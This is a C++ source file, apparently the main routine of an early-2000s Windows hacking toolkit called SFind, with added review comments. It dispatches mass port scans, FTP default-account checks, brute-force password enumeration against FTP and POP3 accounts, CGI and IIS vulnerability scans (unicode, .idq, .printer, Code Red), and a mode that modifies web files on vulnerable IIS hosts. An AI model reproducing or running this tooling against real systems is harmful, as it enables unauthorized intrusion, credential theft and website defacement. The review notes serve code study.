📄 unicode.cpp
/*
=========SFind command line super tools version 1.9==========
========By Sunw 1999-2001. http://sw_sun.myetang.com=========
*/
#include "afxext.h"
#include "winsock.h"
#include "iostream.h"
#include "fstream.h"
#include "unicode.h"
#include "windows.h"
// Function declarations

// Progress display.
void plango();

// Set the console cursor coordinates.
bool ResetCursor(int y, int x);

// Thread routine: exhaustive password enumeration against FTP / POP3.
UINT cracker(LPVOID pass);

// Work out which IIS vulnerability type is being scanned for.
void checkiisholetype();

// Check whether the current thread count has reached its limit.
void TestThread(int thread = 50);

// Wait for the worker threads to end.
void WaitThreadEnd();

// Help text.
void usage(char *prog);

// Dictionary length (number of positions). Argument 0 (the default) means
// a-z, 1 means 0-9, 2 means both combined.
int passdigit(int type = 0);

// Modify the web files of a host that has the unicode vulnerability.
int uhack(char *ip);

// Version banner.
void ver();

// Thread routine: scan for anonymous FTP login.
UINT ftpanonymous(LPVOID ip);

// Thread routine: scan for CGI vulnerabilities.
UINT cgiscan(LPVOID cgistr);

// Thread routine: scan for IIS vulnerabilities.
UINT iisscan(LPVOID ip);

// Thread routine: port scan.
UINT pscan(LPVOID port);
// Variable definitions (all file-scope, shared between main and the worker threads)

HANDLE hstdout = NULL;
WSADATA wsadata;

// Log stream: main writes each invocation's command line to "sfind.txt"
// (a relative path, so it lands in the working directory).
ofstream myf("sfind.txt", ios::ate);

HANDLE HMUTEX;

// Counters updated by main's launch loops.
int maxthread = 0;      // bumped once per worker launch
int ok = 0;             // printed as the "Find N ..." total
int nub = 0;            // printed as the host count
int portip;             // current target address, host byte order
int ipstart;            // inet_addr() of the first address
int ipstop;             // inet_addr() of the last address
int hoststart;          // ipstart in host byte order
int hoststop;           // ipstop in host byte order
int plan = 0;
int line = 5;
int searchnumber;       // number of items in the current run
int searchend = 0;
int digit = 1;          // how many characters of a candidate main copies into strch

short portx;            // index into ports[] for the standard scan

// Candidate buffer handed to the cracker threads by pointer.
// NOTE(review): 14 bytes with no spare byte for a terminator.
char strch[14];

char *type;             // argv[1], the mode switch
char *message;
char *uhackip;          // single-target address string
char *webpath = "c:\\inetpub\\wwwroot";
char sendbuf[100];
char checkhole[100];
char iisholemessage[100];
char *ftpuser;

bool ptop = false;
bool porttype = false;  // set once a valid -p argument shape was recognised
bool ftpopt = false;
bool connecterror = false;
bool endx = false;      // stop flag tested by the enumeration loops

CWinThread *pthread;
// Program entry point. Stores argv[1] in the global `type`, starts Winsock, writes the
// command line to the log stream myf, then runs exactly one mode chosen by argv[1]:
//   -p                        port scan (three argument shapes, see below)
//   -ftp                      FTP account check over an address range
//   -cracker                  exhaustive password enumeration against one FTP/POP3 account
//   -cgi                      CGI checks against one host
//   -um                       calls uhack() for one host
//   -idq/-pri/-uni/-codered   IIS checks over an address range
// Work is handed to MFC worker threads through AfxBeginThread; TestThread() is called
// before every launch and WaitThreadEnd() after the launch loop.
// Returns -1 when no option is given, when WSAStartup fails, or when the -p / -um
// argument count is not recognised; returns 0 otherwise.
//
// NOTE(review): the early `return -1` paths inside the -p and -um branches skip
// WSACleanup() and the closing "COMMAND OVER." log line.
// NOTE(review): arguments are classified only by strlen() (<7 is treated as a port,
// >7 as an IP address); inet_addr() results are never compared with INADDR_NONE.
// NOTE(review): every `CWinThread* pthread=...` below declares a block-local that
// shadows the global pthread, and the AfxBeginThread result is never checked.
// Forensics: each run leaves its full command line in sfind.txt (see myf).
int main(int argc,char *argv[])
{
if (argc<2){usage(argv[0]);return -1;}
type=argv[1];
if (WSAStartup(MAKEWORD(1,1),&wsadata)!=0){cout<<"wsatartup error"<<endl;return -1;}
// Record the complete command line in the log file.
myf<<"COMMAND: ";
for (int argccmp=0;argccmp<argc;argccmp++)
{
myf<<argv[argccmp]<<" ";
}
myf<<endl;
// Not a real loop: every path through the body ends in break or return, so it runs
// once and serves as a block that can be left early with break.
for (;;)
{
// Port scan
if (stricmp(type,"-p")==0)
{
// Custom port-to-port scan; argument shape: 1 255 127.0.0.1
if (argc==5&&strlen(argv[2])<7&&strlen(argv[3])<7&&strlen(argv[4])>7)
{ ver();
// Reject a target whose last octet is 0 or 255.
if (htonl(inet_addr(argv[4]))%256==0||htonl(inet_addr(argv[4]))%256==255)
{cout<<"invalidation address."<<endl;break;}
porttype=true;
nub=1;// this mode scans only one host per run
portip=htonl(inet_addr(argv[4]));
ptop=true;
searchnumber=atoi(argv[3])-atoi(argv[2]);
// One worker per port; the port number itself is passed as the thread argument.
// NOTE(review): startport is a short compared against an int bound (end port + 1),
// and atoi() gives no error indication for non-numeric input.
for(short int startport=atoi(argv[2]);startport<=atoi(argv[3])+1;startport++,maxthread++,plan++,searchend++)
{
TestThread();
CWinThread* pthread=AfxBeginThread(pscan,LPVOID(startport));
}
}
// Standard port scan: one IP, or a start and an end IP
// argc==3 reuses the single address as the end of the range by writing it into argv[3].
if ((argc==3)&&(strlen(argv[2])>7)||((argc==4)&&strlen(argv[2])>7&&strlen(argv[3])>7))
{ ver();
porttype=true;
if (argc==3) argv[3]=argv[2];
ipstart=inet_addr(argv[2]);
ipstop=inet_addr(argv[3]);
hoststart=ntohl(ipstart);
hoststop=ntohl(ipstop);
searchnumber=hoststop-hoststart;
}
// Custom single-port scan; argument shape: 3389 127.0.0.1 127.0.0.255
// argc==4 reuses the single address as the end of the range by writing it into argv[4].
if (((argc==5)&&(strlen(argv[2])<7)&&(strlen(argv[3]))>7&&(strlen(argv[4])>7))||((argc==4)&&(strlen(argv[2])<7)&&(strlen(argv[3])>7)))
{ ver();
porttype=true;
if (argc==4) argv[4]=argv[3];
ipstart=inet_addr(argv[3]);
ipstop=inet_addr(argv[4]);
hoststart=ntohl(ipstart);
hoststop=ntohl(ipstop);
searchnumber=hoststop-hoststart;
}
// Walk the address range in host byte order. The loop condition tests hoststart,
// which is advanced together with portip.
// NOTE(review): this loop also runs when only the port-to-port shape above matched;
// hoststart and hoststop are then still their initial values.
for (portip=hoststart;hoststart<=hoststop;hoststart++,portip++,nub++,maxthread++,searchend++,plan++)
{
if ((portip%256)==0) {searchnumber--;nub--; maxthread--;continue;} // skip addresses ending in .0 (the author's comment calls this the localhost address)
if ((portip%256)==255) {searchnumber--;nub--;maxthread--;continue;} // skip the broadcast address (.255)
// Custom single-port scan: 3389 127.0.0.1 127.0.0.255
if (((argc==5)&&(strlen(argv[2])<7)&&(strlen(argv[3]))>7&&(strlen(argv[4])>7))||((argc==4)&&(strlen(argv[2])<7)&&(strlen(argv[3])>7)))
{
TestThread();
// The thread argument is the port string argv[2]; the address is not passed.
CWinThread* pthread=AfxBeginThread(pscan,LPVOID(argv[2]));
Sleep(10);// delay for reading the IP address; presumably gives the new thread time to read the global portip before it advances — confirm in pscan
}
// Standard port scan: -p 127.0.0.1 127.0.0.255
if ((argc==3)&&(strlen(argv[2])>7)||((argc==4)&&strlen(argv[2])>7&&strlen(argv[3])>7))
{
// Ten entries of the ports[] table (defined outside this listing) per host.
for (portx=0;portx<10;portx++,maxthread++)
{
TestThread();
CWinThread* pthread=AfxBeginThread(pscan,LPVOID(ports[portx]));
Sleep(10); // delay for reading the IP address (see above)
}
maxthread--;
}
}
// No argument shape matched: print usage and exit (without WSACleanup).
if(porttype==false) {usage(argv[0]);return -1;}
WaitThreadEnd();
cout<<nub<<" Host search complete."<<" Find "<<ok<<" port(s)!"<<endl;
break;
}
// FTP anonymous-login test
// NOTE(review): this branch never checks argc. With only "-ftp" on the command line,
// argv[2] is NULL and argv[3] lies beyond argv[argc], so the stricmp()/inet_addr()
// calls below read invalid pointers.
if (stricmp(type,"-ftp")==0)
{ if ((argc==5&&stricmp(argv[4],"-admin")==0)||(argc==4&&stricmp(argv[3],"-admin")==0)) ftpopt=true;
// A single address (with or without -admin after it) becomes a one-host range.
if (argc==3) argv[3]=argv[2];
if (stricmp(argv[3],"-admin")==0) argv[3]=argv[2];
ver();
ipstart=inet_addr(argv[2]);
ipstop=inet_addr(argv[3]);
hoststart=ntohl(ipstart);
hoststop=ntohl(ipstop);
searchnumber=hoststop-hoststart;
// One worker per address; the address itself (host byte order) is the thread argument.
for (portip=hoststart;portip<=hoststop;portip++,nub++,maxthread++,searchend++,plan++)
{
if ((portip%256)==0) {searchnumber--;maxthread--;nub--;continue;} // skip addresses ending in .0 (the author's comment calls this the localhost address)
if ((portip%256)==255) {searchnumber--;maxthread--;nub--;continue;} // skip the broadcast address (.255)
TestThread(40);
CWinThread* pthread=AfxBeginThread(ftpanonymous,LPVOID(portip));
}
WaitThreadEnd();
cout<<nub<<" Host search complete."<<" Find "<<ok<<" hole!"<<endl;
break;
}
// Exhaustive enumeration test
// Any other argument count or protocol name falls straight through to
// WaitThreadEnd() and break without printing usage.
if (stricmp(argv[1],"-cracker")==0)
{
if (argc==6&&(stricmp(argv[2],"ftp")==0||stricmp(argv[2],"pop")==0))
{ ver();
uhackip=argv[3];
ftpuser=argv[4];
// ftpopt doubles as the protocol selector here: true = FTP, false = POP3.
if (stricmp(argv[2],"ftp")==0)
{ftpopt=true;cout<<"Ftp server: "<<uhackip<<endl;}
else {ftpopt=false;cout<<"Pop3 server: "<<uhackip<<endl;}
cout<<"User name : "<<ftpuser<<endl;
// Lower-case letter enumeration loop
// ch[] is a 14-position counter with ch[0] as the fastest-moving position. '`' (96)
// is the character before 'a' (97); 122 is 'z'. endx is the stop flag.
// NOTE(review): strncpy() does not NUL-terminate, ch[] has no terminator, and strch
// is exactly 14 bytes, so strch is only a valid C string while digit < 14 and the
// rest of the buffer is still zero. Every worker also receives the same strch pointer
// while this loop keeps overwriting it; whether cracker() copies it first is not
// visible here.
if (stricmp(argv[5],"SmallLetter")==0||stricmp(argv[5],"CapitalLetter")==0)
{
char ch[14]={'a','`','`','`','`','`','`','`','`','`','`','`','`','`'};
for(;(int)ch[13]<=122;ch[13]++){if (endx==true) break;
for(;(int)ch[12]<=122;ch[12]++){if (endx==true) break;
for(;(int)ch[11]<=122;ch[11]++){if (endx==true) break;
for(;(int)ch[10]<=122;ch[10]++){if (endx==true) break;
for(;(int)ch[9]<=122;ch[9]++){if (endx==true) break;
for(;(int)ch[8]<=122;ch[8]++){if (endx==true) break;
for(;(int)ch[7]<=122;ch[7]++){if (endx==true) break;
for(;(int)ch[6]<=122;ch[6]++){if (endx==true) break;
for(;(int)ch[5]<=122;ch[5]++){if (endx==true) break;
for(;(int)ch[4]<=122;ch[4]++){if (endx==true) break;
for(;(int)ch[3]<=122;ch[3]++){if (endx==true) break;
for(;(int)ch[2]<=122;ch[2]++){if (endx==true) break;
for(;(int)ch[1]<=122;ch[1]++){if (endx==true) break;
for(;(int)ch[0]<=122;ch[0]++,plan++,maxthread++){if (endx==true) break;
strncpy(strch,ch,digit);
passdigit();
TestThread(100);
if (stricmp(argv[5],"CapitalLetter")==0)
strupr(strch);
CWinThread* pthread=AfxBeginThread(cracker,LPVOID(strch));
Sleep(20);
//if (stricmp(strch,"az")==0)
// endx=true;
}ch[0]='a';}ch[1]='a';}ch[2]='a';}ch[3]='a';}ch[4]='a';}ch[5]='a';}ch[6]='a';}ch[7]='a';}ch[8]='a';}ch[9]='a';}ch[10]='a';}ch[11]='a';}ch[12]='a';}ch[13]='a';
}
// Digit enumeration test
// Same counter layout; '/' (47) is the character before '0' (48) and 57 is '9'.
// The copy length is fixed at 5 here instead of using digit.
if (stricmp(argv[5],"Number")==0)
{
char ch[14]={'0','0','0','0','0','/','/','/','/','/','/','/','/','/'};
for(;(int)ch[13]<=57;ch[13]++){ if (endx==true) break;
for(;(int)ch[12]<=57;ch[12]++){ if (endx==true) break;
for(;(int)ch[11]<=57;ch[11]++){ if (endx==true) break;
for(;(int)ch[10]<=57;ch[10]++){ if (endx==true) break;
for(;(int)ch[9]<=57;ch[9]++){ if (endx==true) break;
for(;(int)ch[8]<=57;ch[8]++){ if (endx==true) break;
for(;(int)ch[7]<=57;ch[7]++){ if (endx==true) break;
for(;(int)ch[6]<=57;ch[6]++){ if (endx==true) break;
for(;(int)ch[5]<=57;ch[5]++){ if (endx==true) break;
for(;(int)ch[4]<=57;ch[4]++){ if (endx==true) break;
for(;(int)ch[3]<=57;ch[3]++){ if (endx==true) break;
for(;(int)ch[2]<=57;ch[2]++){ if (endx==true) break;
for(;(int)ch[1]<=57;ch[1]++){ if (endx==true) break;
for(;(int)ch[0]<=57;ch[0]++,maxthread++){ if (endx==true) break;
strncpy(strch,ch,5);
passdigit(1);
TestThread(100);
CWinThread* pthread=AfxBeginThread(cracker,LPVOID(strch));
//cracker(strch);
//cout<<maxthread;
//Sleep(3000);
}ch[0]='0';}ch[1]='0';}ch[2]='0';}ch[3]='0';}ch[4]='0';}ch[5]='0';}ch[6]='0';}ch[7]='0';}ch[8]='0';}ch[9]='0';}ch[10]='0';}ch[11]='0';}ch[12]='0';}ch[13]='0';
}
// Mixed letters and digits. 58 is ':' (the character after '9'); each position
// jumps from there to 'a', so it runs 0-9 and then a-z.
if (stricmp(argv[5],"SLAndNum")==0||stricmp(argv[5],"CLAndNum")==0)
{
char ch[14]={'0','/','/','/','/','/','/','/','/','/','/','/','/','/'};
for(;(int)ch[13]<=122;ch[13]++){if ((int)ch[13]==58) ch[13]='a'; if (endx==true) break;
for(;(int)ch[12]<=122;ch[12]++){if ((int)ch[12]==58) ch[12]='a'; if (endx==true) break;
for(;(int)ch[11]<=122;ch[11]++){if ((int)ch[11]==58) ch[11]='a'; if (endx==true) break;
for(;(int)ch[10]<=122;ch[10]++){if ((int)ch[10]==58) ch[10]='a'; if (endx==true) break;
for(;(int)ch[9]<=122;ch[9]++){if ((int)ch[9]==58) ch[9]='a'; if (endx==true) break;
for(;(int)ch[8]<=122;ch[8]++){if ((int)ch[8]==58) ch[8]='a'; if (endx==true) break;
for(;(int)ch[7]<=122;ch[7]++){if ((int)ch[7]==58) ch[7]='a'; if (endx==true) break;
for(;(int)ch[6]<=122;ch[6]++){if ((int)ch[6]==58) ch[6]='a'; if (endx==true) break;
for(;(int)ch[5]<=122;ch[5]++){if ((int)ch[5]==58) ch[5]='a'; if (endx==true) break;
for(;(int)ch[4]<=122;ch[4]++){if ((int)ch[4]==58) ch[4]='a'; if (endx==true) break;
for(;(int)ch[3]<=122;ch[3]++){if ((int)ch[3]==58) ch[3]='a'; if (endx==true) break;
for(;(int)ch[2]<=122;ch[2]++){if ((int)ch[2]==58) ch[2]='a'; if (endx==true) break;
for(;(int)ch[1]<=122;ch[1]++){if ((int)ch[1]==58) ch[1]='a'; if (endx==true) break;
for(;(int)ch[0]<=122;ch[0]++){if ((int)ch[0]==58) ch[0]='a'; if (endx==true) break;
strncpy(strch,ch,digit);
passdigit();
TestThread(100);
if (stricmp(argv[5],"CLAndNum")==0)
strupr(strch);
CWinThread* pthread=AfxBeginThread(cracker,LPVOID(strch));
}ch[0]='0';}ch[1]='0';}ch[2]='0';}ch[3]='0';}ch[4]='0';}ch[5]='0';}ch[6]='0';}ch[7]='0';}ch[8]='0';}ch[9]='0';}ch[10]='0';}ch[11]='0';}ch[12]='0';}ch[13]='0';
}
}
WaitThreadEnd();
break;
}
// CGI vulnerability scan
// Single host only (argc must be 3). 644 is a hard-coded entry count for the
// cgiholes[] table, which is defined outside this listing; one worker per entry.
if (stricmp(type,"-cgi")==0&&argc==3)
{ ver();
nub=1;
uhackip=argv[2];
searchnumber=644;
// Reject a target whose last octet is 0 or 255.
if (htonl(inet_addr(uhackip))%256==0||htonl(inet_addr(uhackip))%256==255)
{cout<<"invalidation address."<<endl;break;}
for (int i=0;i<644;i++,maxthread++,plan++,searchend++)
{
TestThread();
CWinThread *pthread=AfxBeginThread(cgiscan,LPVOID(cgiholes[i]));
}
WaitThreadEnd();
cout<<nub<<" Host search complete."<<" Find "<<ok<<" hole(s)!"<<endl;
break;
}
// Unicode vulnerability: modify web pages
// Takes 4 or 5 arguments: with 5, argv[3] replaces the default webpath and argv[4]
// is the message; with 4, argv[3] is the message. The work itself is in uhack().
if (stricmp(type,"-um")==0)
{
if (argc<4||argc>5) {usage(argv[0]);return -1;}
if (argc==5) {webpath=argv[3];message=argv[4];}
if (argc==4) message=argv[3];
ver();
uhack(argv[2]);
break;
}
// IIS vulnerability scan
// NOTE(review): no argc check here either; with only the option on the command line,
// inet_addr() receives NULL for argv[2] and argv[3] is read beyond argv[argc].
if (stricmp(type,"-idq")==0||stricmp(type,"-pri")==0||stricmp(type,"-uni")==0||stricmp(type,"-codered")==0)
{
checkiisholetype();
// A single address becomes a one-host range.
if (argc==3) argv[3]=argv[2];
ver();
ipstart=inet_addr(argv[2]);
ipstop=inet_addr(argv[3]);
hoststart=ntohl(ipstart);
hoststop=ntohl(ipstop);
searchnumber=hoststop-hoststart;
// One worker per address; plan is wrapped back to -1 once it reaches 3.
for (portip=hoststart;portip<=hoststop;portip++,nub++,maxthread++,plan++,searchend++)
{ if (plan>=3) {plan=-1;}
if ((portip%256)==0) {searchnumber--;maxthread--;nub--;continue;} // skip addresses ending in .0 (the author's comment calls this the localhost address)
if ((portip%256)==255) {searchnumber--;maxthread--;nub--;continue;} // skip the broadcast address (.255)
TestThread();
CWinThread* pthread=AfxBeginThread(iisscan,LPVOID(portip));
}
WaitThreadEnd();
cout<<nub<<" Host search complete."<<" Find "<<ok<<" hole!"<<endl;
break;
}
// Unrecognised option: print the help text.
usage(argv[0]);
break;
}
WSACleanup();
myf<<"COMMAND OVER."<<endl<<endl<<endl;
return 0;
}
//帮助提示函数
void usage(char* prog)
{
ver();
cout<<"Usage: "<<prog<<" <Option>"<<" <Parameter>"<<endl;
cout<<endl;
cout<<"<Option>: "<<endl;
cout<<" -p <Port|Port-Port> <IP|IP-IP> Scan port"<<endl;
cout<<" -cgi <IP address> Scan cgi hole"<<endl;
cout<<" -pri <Start IP> <End IP> Scan .printer hole"<<endl;
cout<<" -uni <Start IP> <End IP> Scan unicode hole"<<endl;
cout<<" -idq <Start IP> <End IP> Scan .idq hole"<<endl;
cout<<" -codered <Start IP> <End IP> Scan codered virus host"<<endl;
cout<<" -ftp <Start IP> <End IP> [-admin] Ftp default and admin accounts check"<<endl;
cout<<" -um <IP addr> [Web path] <Message> Modify web files"<<endl;